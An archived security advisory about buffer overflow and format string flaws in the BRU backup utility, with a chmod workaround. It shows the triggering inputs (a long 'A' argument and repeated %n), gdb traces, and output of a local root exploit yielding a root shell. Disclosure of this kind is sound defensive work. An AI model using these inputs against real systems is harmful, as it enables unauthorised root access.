Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: bt665.txt

bru has buffer overflow and format issues





--------------080401020300050106090005
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------080401020300050106090005
Content-Type: text/plain;
 name="SRT2003-07-16-0358.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="SRT2003-07-16-0358.txt"

Secure Network Operations, Inc.           http://www.secnetops.com
Anvil IDS appliance 		 http://www.secnetops.com/products
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-16-0358
Product                 : Backup and Restore Utility for Unix (BRU)
Version                 : <= 17.0
Vendor                  : http://www.tolisgroup.com (purchased EST code)
Class                   : local
Criticality             : Medium to Low
Operating System(s)     : *nix


High Level Explanation
************************************************************************
High Level Description  : bru has buffer overflow and format issues
What to do              : upgrade to the Tolisgroup BRU or chmod -s bru


Technical Details
************************************************************************
Proof Of Concept Status : SNO has exploits for the described situation
Low Level Description   :

EST BRU(TM) Backup and Restore Utility is the No. 1 award winning product 
for Linux backup, having won more awards and maintained a larger installed 
base than any other commercial Linux backup solution. A respected industry 
veteran, EST has been developing UNIX backup products since 1985. 

Enhanced Software Technologies Inc. the previous vendor of BRU has sold 
its product to the current vendor The Tolisgroup. 

As described by The Tolisgroup, BRU is backup science at its best. By 
exacting design, BRU solutions never abort the restore and recover the 
most data of any backup solution. 

In the past there have been a few issues with BRU reported to the public. 
One such issue (BRUEXECLOG) has prompted the vendor to remove the suid 
bit from BRU. The current Tolisgroup version of BRU does not by default
ship with the suid bit set, however we feel it is possible users could 
read old suggestions on newsgroups or the web and chmod +s bru. The
Tolisgroup has never shipped BRU with a suid bit. In the past BRU would
prompt regular users to set the suid bit on BRU however I can not confirm
that the Tolisgroup version has ever had this behavior. 

elguapo@gentoo elguapo $ bru
bru: [W171] warning - BRU must be owned by root and have suid bit set

By default BRU-15.1-3.i386.rpm has the suid bit, BRU2000-15.0P-1.i386.rpm
however does not. Both versions will prompt a user to set the bit if it 
does not already exist. 

The below mentioned issues DO affect the Tolisgroup version however if
the user has not set the suid bit there is no problem. The Tolisgroup has
stated it will take measures to ensure in the future BRU does not contain
the potential to be exploited. 

The 2 issues at hand can be reproduced as follows...

elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)

elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)

Both issues appear to be caused by poor usage of vsprintf(). 

Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40071d96 in vfprintf () from /lib/libc.so.6
#1  0x0805543a in step ()

Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0  0x08060027 in step ()
Cannot access memory at address 0x41414141

These issues can easily be exploited by an attacker to gain root access. 

elguapo@gentoo tmp $ head ./0x82-BRU_overformat.c
/*
**
** backup and restore utility (BRU) local root exploit.
** Target package: BRU-15.1-3.i386.rpm
**
** bug found by "Kevin Finisterre"(KF), <dotslash@snosoft.com>.
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

elguapo@gentoo tmp $ cc -o 0x82-BRU_overformat 0x82-BRU_overformat.c
elguapo@gentoo tmp $ ./0x82-BRU_overformat 1

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e
[*] It's my message:
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFK...
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFthanks!!
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)

elguapo@gentoo tmp $ ./0x82-BRU_overformat 2

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e, $-flag: 70, pad: 0
x82: [E155] error - memory fault (SIGSEGV)
...
[*] shellcode: 0xbfffff9e, $-flag: 73, pad: 2
x82: [E001] specify mode (-cdeghitx)
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)

Patch or Workaround     : chmod -s /path/to/bru or Purchase BRU from 
The Tolisgroup.

Vendor Status           : Original vendor no longer exists. The Tolisgroup
BRU is not vulnerable by default, please upgrade. 

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.


--------------080401020300050106090005--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH